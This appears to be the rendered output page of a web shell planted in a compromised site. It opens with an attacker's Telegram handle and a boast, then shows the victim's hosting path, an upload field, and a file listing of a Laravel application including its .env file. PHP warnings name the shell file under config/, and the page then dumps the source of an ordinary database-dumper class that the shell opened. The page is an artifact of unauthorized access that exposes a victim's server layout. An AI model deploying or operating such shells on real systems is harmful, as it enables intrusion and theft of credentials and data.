telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log22181663 KBJuly 18 2025 22:16:370644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
dbName; } public function setDbName(string $dbName): self { $this->dbName = $dbName; return $this; } public function getDatabaseUrl(): string { return $this->databaseUrl; } public function setDatabaseUrl(string $databaseUrl): self { $this->databaseUrl = $databaseUrl; $this->configureFromDatabaseUrl(); return $this; } public function setUserName(string $userName): self { $this->userName = $userName; return $this; } public function setPassword(string $password): self { $this->password = $password; return $this; } public function setHost(string $host): self { $this->host = $host; return $this; } public function getHost(): string { return $this->host; } public function setPort(int $port): self { $this->port = $port; return $this; } public function setSocket(string $socket): self { $this->socket = $socket; return $this; } public function setTimeout(int $timeout): self { $this->timeout = $timeout; return $this; } public function setDumpBinaryPath(string $dumpBinaryPath = ''): self { if ($dumpBinaryPath !== '' && ! str_ends_with($dumpBinaryPath, '/')) { $dumpBinaryPath .= '/'; } $this->dumpBinaryPath = $dumpBinaryPath; return $this; } public function getCompressorExtension(): string { return $this->compressor->useExtension(); } public function useCompressor(Compressor $compressor): self { $this->compressor = $compressor; return $this; } public function includeTables(string | array $includeTables): self { if (! empty($this->excludeTables)) { throw CannotSetParameter::conflictingParameters('includeTables', 'excludeTables'); } if (! is_array($includeTables)) { $includeTables = explode(', ', $includeTables); } $this->includeTables = $includeTables; return $this; } public function excludeTables(string | array $excludeTables): self { if (! empty($this->includeTables)) { throw CannotSetParameter::conflictingParameters('excludeTables', 'includeTables'); } if (! is_array($excludeTables)) { $excludeTables = explode(', ', $excludeTables); } $this->excludeTables = $excludeTables; return $this; } public function addExtraOption(string $extraOption): self { if (! empty($extraOption)) { $this->extraOptions[] = $extraOption; } return $this; } public function addExtraOptionAfterDbName(string $extraOptionAfterDbName): self { if (! empty($extraOptionAfterDbName)) { $this->extraOptionsAfterDbName[] = $extraOptionAfterDbName; } return $this; } abstract public function dumpToFile(string $dumpFile): void; public function checkIfDumpWasSuccessFul(Process $process, string $outputFile): void { if (! $process->isSuccessful()) { throw DumpFailed::processDidNotEndSuccessfully($process); } if (! file_exists($outputFile)) { throw DumpFailed::dumpfileWasNotCreated($process); } if (filesize($outputFile) === 0) { throw DumpFailed::dumpfileWasEmpty($process); } } protected function configureFromDatabaseUrl(): void { $parsed = (new DsnParser($this->databaseUrl))->parse(); $componentMap = [ 'host' => 'setHost', 'port' => 'setPort', 'database' => 'setDbName', 'username' => 'setUserName', 'password' => 'setPassword', ]; foreach ($parsed as $component => $value) { if (isset($componentMap[$component])) { $setterMethod = $componentMap[$component]; if (! $value || in_array($value, ['', 'null'])) { continue; } $this->$setterMethod($value); } } } protected function getCompressCommand(string $command, string $dumpFile): string { $compressCommand = $this->compressor->useCommand(); if ($this->isWindows()) { return "{$command} | {$compressCommand} > {$dumpFile}"; } return "(((({$command}; echo \$? >&3) | {$compressCommand} > {$dumpFile}) 3>&1) | (read x; exit \$x))"; } protected function echoToFile(string $command, string $dumpFile): string { $dumpFile = '"' . addcslashes($dumpFile, '\\"') . '"'; if ($this->compressor) { return $this->getCompressCommand($command, $dumpFile); } return $command . ' > ' . $dumpFile; } protected function determineQuote(): string { return $this->isWindows() ? '"' : "'"; } protected function isWindows(): bool { return str_starts_with(strtoupper(PHP_OS), 'WIN'); } }